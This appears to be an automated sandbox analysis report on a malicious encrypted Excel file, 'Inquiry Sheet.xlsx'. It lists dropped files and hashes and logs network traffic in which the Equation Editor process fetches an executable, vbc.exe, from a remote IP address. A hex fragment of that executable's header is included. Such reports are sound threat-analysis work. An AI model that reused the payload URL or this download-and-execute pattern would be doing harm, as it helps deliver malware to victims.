SSDEEP:	24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
MD5:	A3C62E516777C15BF216F12143693C61
SHA1:	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
SHA-256:	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
SHA-512:	AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
Malicious:	false
Preview:	BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................

C:\Users\user\Desktop\~$Inquiry Sheet.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	139264
Entropy (8bit):	6.609176626733107
Encrypted:	false
SSDEEP:	1536:T8hQbCg3d/xOfo6dUoEiL7yQMLIn6Otq/CrAvI7S6mStD2arf6FRo6DomgJ:DGAZ6dNEc/MLo6Ot57S69D2aD6F5oj
MD5:	B7E5ACDADE5630DBF1AB4B211DDC16DB
SHA1:	EF39B9D9B31F61A538C79D06171B2F3FB62D3346
SHA-256:	F16CD8C15E34505A4C72C77DF972264F67E97C2E0B79B205F82BB59F26C09998
SHA-512:	61FA3478A69E18BF8024E656AB3C7334B96C94BA8A64E672596D77FE84F5E247508E13331DBE10D20488EDAEA7E0D976D8E5C1B27820AB4091F063E7833E05B9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 18%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6..W..W..W..K..W..u..W..q..W.Rich.W.........................PE..L.....kH..........................................@..........................`......\b..........................................(.... ..:;..................................................................8... ....................................text............................... ..`.data...XE..........................@....rsrc...:;... ...@..................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.988006994673915
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	Inquiry Sheet.xlsx
File size:	601480
MD5:	b079763f132db9b4d979256a28909892
SHA1:	3f8ef9821671cbc8267baa2c6e9a41a18af45f78
SHA256:	71db7caab688d41a1c6bca4cafbf782d50a670a7c7e73ad3000dea754959cf2e
SHA512:	cbe0ed7d4eefa62822efa8eaa389197d69a256e7966017f0edb92abd26ae0062f2113fecffa2b726d2e291907d144e8c9c93370c47be734c9a16015cfb08efb4
SSDEEP:	12288:2nCwXTD6QrBSx+wiiHmFi1KTBOh0jOTFn6RoSFuSc:2rDZdrwHmFikFO/h6Royc
File Content Preview:	........................>.......................................................................................z..............................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Network Behavior

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 13, 2021 20:16:54.802037954 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:54.832849979 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:54.833056927 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:54.834225893 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:54.899867058 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:54.950155973 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:54.950234890 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:54.950273991 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:54.950309992 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:54.950387955 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:54.950689077 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:54.980690956 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:54.980767012 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:54.980792046 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:54.980812073 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:54.980850935 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:54.980890036 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:54.980910063 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:54.980923891 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:54.980959892 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:54.980995893 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:54.981008053 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:54.981044054 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:54.981065989 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:54.981086016 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:54.981107950 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.019262075 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.019306898 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.019337893 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.019365072 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.019382000 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.019402027 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.019422054 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.019459963 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.019467115 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.019493103 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.019509077 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.019546032 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.019551992 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.019578934 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.019592047 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.019619942 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.019629002 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.019654989 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.019668102 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.019699097 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.019705057 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.019726992 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.019740105 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.019763947 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.019774914 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.019800901 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.019812107 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.019838095 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.019853115 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.019879103 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.022079945 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.048996925 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.049079895 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.049108982 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.049122095 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.049158096 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.049197912 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.049220085 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.049233913 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.049259901 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.049293041 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.049309969 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.049343109 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.049379110 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.049413919 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.049438000 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.049444914 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.049468994 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.049504042 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.049519062 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.049551010 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.049571037 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.049603939 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.049618959 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.049652100 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.049666882 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.049698114 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.049715996 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.049753904 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.049766064 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.049798965 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.049818993 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.049851894 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.049870968 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.049904108 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.049920082 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.049952030 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.049968004 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.049998999 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.050017118 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.050049067 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.050065041 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.050092936 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.050108910 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.050141096 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.050178051 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.050209999 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.050228119 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.050260067 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.050273895 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.050302029 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.050313950 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.050345898 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.050359011 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.050391912 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.050407887 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.050437927 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.050453901 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.050482035 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.052182913 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.052295923 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.052357912 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.052381039 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.052407026 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.052424908 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.052437067 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.059355021 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.078758001 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.078882933 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.079010010 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.079024076 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.081343889 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.081433058 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.081486940 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.081494093 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.081506968 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.081536055 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.081602097 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.081659079 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.081686974 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.081717968 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.081749916 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.081758022 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.081783056 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.081824064 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.081864119 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.081871986 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.081896067 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.081919909 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.081953049 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.081991911 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.082058907 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.082071066 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.082109928 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.082115889 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.082153082 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.082185984 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.082201958 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.082237005 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.082259893 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.082293034 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.082298994 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.082321882 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.082345963 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.082387924 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.082402945 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.082437038 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.082463026 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.082504988 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.082520962 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.082541943 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.082564116 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.082588911 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.082602024 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.082619905 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.082684040 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.082720041 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.082729101 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.082794905 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.082813025 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.082843065 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.082854033 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.082878113 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.082891941 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.082921982 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.082931042 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.082952976 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.082968950 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.083000898 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.083008051 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.083029985 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.083041906 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.083067894 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.083076000 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.083105087 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.083132029 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.083148956 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.083195925 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.083224058 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.083233118 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.083256006 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.083271027 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.083285093 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.083295107 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.083318949 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.083326101 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.083347082 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.083360910 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.083389997 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.083401918 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.083431959 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.083439112 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.083462000 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.083477020 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.083501101 CEST	80	49165	212.192.246.25	192.168.2.22
Sep 13, 2021 20:16:55.083508968 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.083529949 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.085974932 CEST	49165	80	192.168.2.22	212.192.246.25
Sep 13, 2021 20:16:55.628360033 CEST	49165	80	192.168.2.22	212.192.246.25

HTTP Request Dependency Graph

212.192.246.25

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	212.192.246.25	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Sep 13, 2021 20:16:54.834225893 CEST	0	OUT	GET /excel/vbc.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 212.192.246.25 Connection: Keep-Alive
Sep 13, 2021 20:16:54.950155973 CEST	1	IN	HTTP/1.1 200 OK Date: Mon, 13 Sep 2021 18:16:54 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29 Last-Modified: Sun, 12 Sep 2021 22:03:18 GMT ETag: "22000-5cbd38416fb31" Accept-Ranges: bytes Content-Length: 139264 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 36 a4 c9 93 57 ca 9a 93 57 ca 9a 93 57 ca 9a 10 4b c4 9a 92 57 ca 9a dc 75 c3 9a 9a 57 ca 9a a5 71 c7 9a 92 57 ca 9a 52 69 63 68 93 57 ca 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b7 98 6b 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 c0 01 00 00 90 00 00 00 00 00 00 bc 14 00 00 00 10 00 00 00 d0 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 60 02 00 00 10 00 00 5c 62 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 c8 01 00 28 00 00 00 00 20 02 00 3a 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 02 00 00 20 00 00 00 00 10 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 bd 01 00 00 10 00 00 00 c0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 58 45 00 00 00 d0 01 00 00 10 00 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 3a 3b 00 00 00 20 02 00 00 40 00 00 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6WWWKWuWqWRichWPELkH@`\b( :;8 .text `.dataXE@.rsrc:; @@@IMSVBVM60.DLL
Sep 13, 2021 20:16:54.950234890 CEST	3	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
